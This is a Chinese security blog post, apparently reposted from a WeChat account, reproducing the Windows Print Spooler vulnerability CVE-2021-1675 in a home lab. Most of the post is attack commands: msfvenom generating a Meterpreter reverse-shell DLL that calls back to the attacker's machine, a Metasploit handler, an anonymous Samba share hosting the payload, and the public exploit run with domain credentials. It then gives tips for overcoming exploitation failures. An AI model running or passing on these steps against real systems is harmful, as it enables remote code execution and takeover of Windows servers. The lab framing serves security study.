微软通杀漏洞-CVE-2021-1675复现

  • A+
所属分类:安全文章

  点击蓝字关注我哦


环境

受害机:window2019(192.168.153.133)

攻击机:kali(192.168.153.134)

利用前提

或许需要:SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限

一定需要:一个普通的域用户

一定需要:开启Spooler服务微软通杀漏洞-CVE-2021-1675复现






环境搭建

安装impacket

git clone https://github.com/cube0x0/impacketcd impacketpython3 ./setup.py install

下配置smb服务

vim /etc/samba/smb.conf

[global]map to guest = Bad Userserver role = standalone serverusershare allow guests = yesidmap config * : backend = tdbsmb ports = 445
[smb]comment = Sambapath = /tmp/guest ok = yesread only = nobrowsable = yes

sudo service smbd start

生成dll和启动msf

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.153.134 LPORT=4444 -f dll -o /tmp/rever.dllmsfconsoleuse exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcprun

微软通杀漏洞-CVE-2021-1675复现

微软通杀漏洞-CVE-2021-1675复现

下载exp

cd ~/git clone https://github.com/cube0x0/CVE-2021-1675.gitcd CVE-2021-1675



利用漏洞

sudo python3 CVE-2021-1675.py djhons.com/test:[email protected]123@192.168.153.133 '\192.168.153.134smbrever.dll'

微软通杀漏洞-CVE-2021-1675复现

微软通杀漏洞-CVE-2021-1675复现

微软通杀漏洞-CVE-2021-1675复现


遇到的坑

第一个坑:

        按照exp里面的smb配置文件配置smb后无法匿名登录,需要提供账号和密码,后删除最后一行后可正常匿名访问。在本次实验时通过资源管理器直接访问smb服务器提示组策略出问题但是这个问题可以忽略(我也不知道为什么可以忽略),还有一个奇怪的是在公司同样的配置物理机可以直接访问smb,在家的电脑上却也需要密码而只有win7能正常访问。反正按照我上面讲的就能利用成功。

微软通杀漏洞-CVE-2021-1675复现

微软通杀漏洞-CVE-2021-1675复现

第二个坑: 

      这是另一个cpp的exp。大概执行过程是受害机会将dll下载到C:WindowsSystem32spooldriversx643这个目录下然后执行。首先这个cpp需要改4个地方,第一个是112行需要改成C:WindowsSystem32DriverStoreFileRepositoryntprint.inf_amd64_[受害机特有的]Amd64、剩下是将三个含有old的路径改为C:\Windows\System32\spool\drivers\x64\%s。问题来了,第一个问题是不知道112行那个受害机特有的路径是啥,第二个问题明明dll是上传到C:WindowsSystem32spooldriversx643这个目录但是exp却是执行的C:WindowsSystem32spooldriversx64这个目录下的dll而这个目录下根本就没有dll。我也尝试把三个含有old路径修改为C:\Windows\System32\spool\drivers\x64\3\%s结果还是不行。

第三个坑:

      因为这个洞和域没关系,我没有域环境也不想搭就偷懒以win7为靶机,结果一直Connection Failed,这个折腾了我很久。我猜测可能和SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限有关系,因为我这个win7虚拟机没有这个两个权限,以前利用potato提权也失败了。

第四个坑: 

      在域控上面尝试过利用域管和本地管理员账号来利用这个漏洞,结果都不行只有普通域用户才能利用成功。如果是普通pc就没有账号的限制,但是在普通pc上利用这个漏洞的意义不大。 

第五个坑:

      利用成功之后sploor这个服务会自动关闭,也就是说这个漏洞只能利用成功一次。


微软通杀漏洞-CVE-2021-1675复现

END

微软通杀漏洞-CVE-2021-1675复现


微软通杀漏洞-CVE-2021-1675复现


看完记得点赞,关注哟,爱您!



请严格遵守网络安全法相关条例!此分享主要用于学习,切勿走上违法犯罪的不归路,一切后果自付!




关注此公众号,回复"Gamma"关键字免费领取一套网络安全视频以及相关书籍,公众号内还有收集的常用工具!

在看你就赞赞我!
微软通杀漏洞-CVE-2021-1675复现


微软通杀漏洞-CVE-2021-1675复现
微软通杀漏洞-CVE-2021-1675复现
微软通杀漏洞-CVE-2021-1675复现
扫码关注我们
微软通杀漏洞-CVE-2021-1675复现



扫码领hacker资料,常用工具,以及各种福利



微软通杀漏洞-CVE-2021-1675复现

转载是一种动力 分享是一种美德


本文始发于微信公众号(Gamma实验室):微软通杀漏洞-CVE-2021-1675复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: